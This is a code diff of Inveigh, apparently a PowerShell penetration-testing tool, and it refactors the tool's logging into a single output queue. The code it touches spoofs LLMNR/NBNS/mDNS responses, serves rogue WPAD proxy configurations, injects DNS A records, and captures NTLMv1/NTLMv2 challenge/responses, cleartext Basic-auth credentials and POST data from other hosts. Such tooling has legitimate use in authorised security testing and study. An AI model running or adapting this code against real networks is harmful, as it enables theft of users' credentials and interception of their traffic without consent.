+ $inveigh.output_queue.Add("[+] HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null
}
if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
{
- $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
+ $inveigh.output_queue.Add("[+] Basic Authentication Realm = $HTTPBasicRealm") > $null
}
$HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
if($HTTPResetDelay.Count -gt 0)
{
- $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
- $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
}
if($Proxy -eq 'Y')
@@ -1057,19 +1076,19 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($proxy_port_check)
{
$Proxy = "N"
- $inveigh.status_queue.Add("Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null
+ $inveigh.output_queue.Add("[-] Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null
}
else
{
- $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null
- $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
- $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null
+ $inveigh.output_queue.Add("[+] Proxy Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Proxy Port = $ProxyPort") > $null
+ $inveigh.output_queue.Add("[+] Proxy Authentication = $ProxyAuth") > $null
$ProxyPortFailover = $ProxyPort + 1
$ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
if($ProxyIgnore.Count -gt 0)
{
- $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
}
if($ProxyIP -eq '0.0.0.0')
@@ -1101,27 +1120,27 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
}
- $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
+ $inveigh.output_queue.Add("[+] WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
if($WPADResponse -and $Proxy -eq 'N')
{
- $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD Custom Response = Enabled") > $null
}
elseif($WPADResponse -and $Proxy -eq 'Y')
{
- $inveigh.status_queue.Add("WPAD Proxy Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD Proxy Response = Enabled") > $null
if($WPADIP -and $WPADPort)
{
- $inveigh.status_queue.Add("WPAD Failover = $WPADIP`:$WPADPort") > $null
+ $inveigh.output_queue.Add("[+] WPAD Failover = $WPADIP`:$WPADPort") > $null
}
}
elseif($WPADIP -and $WPADPort)
{
- $inveigh.status_queue.Add("WPAD Response = Enabled") > $null
- $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null
+ $inveigh.output_queue.Add("[+] WPAD Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD = $WPADIP`:$WPADPort") > $null
if($WPADDirectHosts)
{
@@ -1131,7 +1150,7 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
}
$WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
- $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
+ $inveigh.output_queue.Add("[+] WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
else
{
@@ -1141,20 +1160,20 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
}
elseif($WPADDirectFile -eq 'Y')
{
- $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD Default Response = Enabled") > $null
$WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}"
}
if($Challenge)
{
- $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
+ $inveigh.output_queue.Add("[+] NTLM Challenge = $Challenge") > $null
}
}
if($MachineAccounts -eq 'N')
{
- $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Machine Account Capture = Disabled") > $null
$inveigh.machine_accounts = $false
}
else
@@ -1167,22 +1186,22 @@ if($ConsoleOutput -ne 'N')
if($ConsoleOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output = $ConsoleOutput") > $null
}
$inveigh.console_output = $true
if($ConsoleStatus -eq 1)
{
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minute") > $null
}
elseif($ConsoleStatus -gt 1)
{
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minutes") > $null
}
}
@@ -1191,11 +1210,11 @@ else
if($inveigh.tool -eq 1)
{
- $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output Disabled Due To External Tool Selection") > $null
}
else
{
- $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Disabled") > $null
}
}
@@ -1211,13 +1230,13 @@ else
if($FileOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
- $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
+ $inveigh.output_queue.Add("[+] Real Time File Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Output Directory = $output_directory") > $null
$inveigh.file_output = $true
}
else
{
- $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Real Time File Output = Disabled") > $null
}
if($FileUnique -eq 'Y')
@@ -1229,70 +1248,94 @@ else
$inveigh.file_unique = $false
}
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
+
if($RunCount)
{
- $inveigh.status_queue.Add("Run Count = $RunCount") > $null
+ $inveigh.output_queue.Add("[+] Run Count = $RunCount") > $null
}
if($RunTime -eq 1)
{
- $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minute") > $null
}
elseif($RunTime -gt 1)
{
- $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minutes") > $null
}
if($ShowHelp -eq 'Y')
{
- $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop manually") > $null
if($inveigh.console_output)
{
- $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
+ $inveigh.output_queue.Add("[*] Press any key to stop real time console output") > $null
}
}
-if($inveigh.status_output)
+while($inveigh.output_queue.Count -gt 0)
{
- while($inveigh.status_queue.Count -gt 0)
+ switch -Wildcard ($inveigh.output_queue[0])
{
- switch -Wildcard ($inveigh.status_queue[0])
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
- {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"}
+ if($inveigh.status_output -and $inveigh.output_stream_only)
{
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Warning($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Warning($inveigh.status_queue[0])
- }
-
- $inveigh.status_queue.RemoveAt(0)
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
}
- default
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ default
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
{
+ Write-Output($inveigh.output_queue[0])
+ }
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.status_queue[0])
- }
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
- $inveigh.status_queue.RemoveAt(0)
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
}
+ $inveigh.output_queue.RemoveAt(0)
}
}
@@ -1344,6 +1387,70 @@ $shared_basic_functions_scriptblock =
return $string_extract
}
+ function SpooferResponseMessage
+ {
+ param ([String]$query_string,[String]$mDNS_type)
+
+ $response_type = "[+]"
+
+ if($SpooferHostsReply -and $SpooferHostsReply -notcontains $query_string)
+ {
+ $response_message = "[$query_string not on reply list]"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $query_string)
+ {
+ $response_message = "[$query_string is on ignore list]"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $response_message = "[$source_IP not on reply list]"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $response_message = "[$source_IP is on ignore list]"
+ }
+ elseif($inveigh.valid_host_list -contains $query_string)
+ {
+ $response_message = "[$query_string is a valid host]"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
+ {
+ $response_message = "[previous capture from $source_IP]"
+ }
+ elseif($source_IP -eq $IP)
+ {
+ $response_message = "[ignoring local request]"
+ }
+ elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
+ {
+ $response_message = ": " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
+ }
+ elseif($destination_IP.IPAddressToString -eq $IP)
+ {
+ $response_message = "[ResponderGuard detected and ignored]"
+ $response_type = "[!]"
+ }
+ elseif($NBNSTypes -notcontains $NBNS_query_type)
+ {
+ $response_message = "[disabled NBNS type]"
+ }
+ elseif($query_string.Trim() -eq '*')
+ {
+ $response_message = "[NBSTAT request]"
+ }
+ elseif($mDNS_type -and $mDNSTypes -notcontains $mDNS_type)
+ {
+ $response_message = "[disabled mDNS type]"
+ }
+ else
+ {
+ $response_message = "[something went wrong]"
+ $response_type = "[-]"
+ }
+
+ return $response_type,$response_message
+ }
+
function ConvertFrom-PacketOrderedDictionary
{
param($packet_ordered_dictionary)
@@ -1356,6 +1463,62 @@ $shared_basic_functions_scriptblock =
return $byte_array
}
+
+
+}
+
+# DNS Functions ScriptBlock
+$DNS_functions_scriptblock =
+{
+
+ function DNSUpdate
+ {
+ param ([String]$DNSName,[String]$DNSData,[Int]$DNSTTL)
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNSName -DNSData $DNSData -DNSTTL $DNSTTL
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $inveigh.DNS_list.Add("1," + $_.Name) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " added") > $null
+ }
+ elseif($DNS_update -eq "[-] Kerberos preauthentication error 0x06")
+ {
+ $inveigh.DNS = $false
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Disabling DNS injection due to auth failure") > $null
+ }
+ else
+ {
+ $inveigh.DNS_list.Add("0," + $_.Name) > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " add failed") > $null
+ }
+
+ }
+
+ function DNSCheck
+ {
+ param ([String]$DNSData,[Array]$DNSHostsIgnore,[Int]$DNSThreshold,[Int]$DNSTTL)
+
+ $inveigh.requested_host_list | Group-Object | ForEach-Object {
+
+ if($_.Count -gt $DNSThreshold)
+ {
+
+ if($DNSHostsIgnore -NotContains $_.Name -and $inveigh.DNS_list -NotContains "0,$($_.Name)" -and $inveigh.DNS_list -NotContains "1,$($_.Name)")
+ {
+ DNSUpdate $_.Name $DNSData $DNSTTL
+ }
+ elseif($DNSHostsIgnore -Contains $_.Name)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Ignored $($_.Name) for DNS injection")
+ }
+
+ }
+
+ }
+
+ }
+
}
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
@@ -1417,42 +1580,31 @@ $SMB_NTLM_functions_scriptblock =
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
- $inveigh.NTLMv2_list.Add($NTLMv2_hash)
+ $inveigh.NTLMv2_list.Add($NTLMv2_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash") > $null
}
else
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)
- $inveigh.console_queue.Add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
{
- $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+ $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") > $null
}
if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+ $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) > $null
}
}
@@ -1464,42 +1616,31 @@ $SMB_NTLM_functions_scriptblock =
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
$inveigh.NTLMv1_list.Add($NTLMv1_hash)
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash") > $null
}
else
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($NTLMv1_hash)
- $inveigh.console_queue.Add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
{
- $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+ $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") > $null
}
if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+ $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) > $null
}
}
@@ -1612,19 +1753,8 @@ $HTTP_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
$HTTP_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener") > $null
}
:HTTP_listener_loop while($inveigh.running -and $HTTP_running)
@@ -1742,38 +1872,13 @@ $HTTP_scriptblock =
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null
if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null
}
}
@@ -1829,21 +1934,9 @@ $HTTP_scriptblock =
if($HTTP_POST_request_old -ne $HTTP_POST_request)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP")
- $inveigh.POST_request_file_queue.Add($HTTP_POST_request)
- $inveigh.POST_request_list.Add($HTTP_POST_request)
-
- if($inveigh.file_output)
- {
- $inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file)
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
- }
-
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP") > $null
+ $inveigh.POST_request_file_queue.Add($HTTP_POST_request) > $null
+ $inveigh.POST_request_list.Add($HTTP_POST_request) > $null
}
$HTTP_POST_request_old = $HTTP_POST_request
@@ -1893,36 +1986,26 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
}
}
@@ -1936,36 +2019,26 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
}
}
@@ -1974,7 +2047,7 @@ $HTTP_scriptblock =
if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($HTTP_source_IP)
+ $inveigh.IP_capture_list.Add($HTTP_source_IP) > $null
}
$HTTP_response_status_code = 0x32,0x30,0x30
@@ -2010,19 +2083,13 @@ $HTTP_scriptblock =
$HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization))
$HTTP_client_close = $true
- $inveigh.cleartext_file_queue.Add($cleartext_credentials)
- $inveigh.cleartext_list.Add($cleartext_credentials)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
+ $inveigh.cleartext_file_queue.Add($cleartext_credentials) > $null
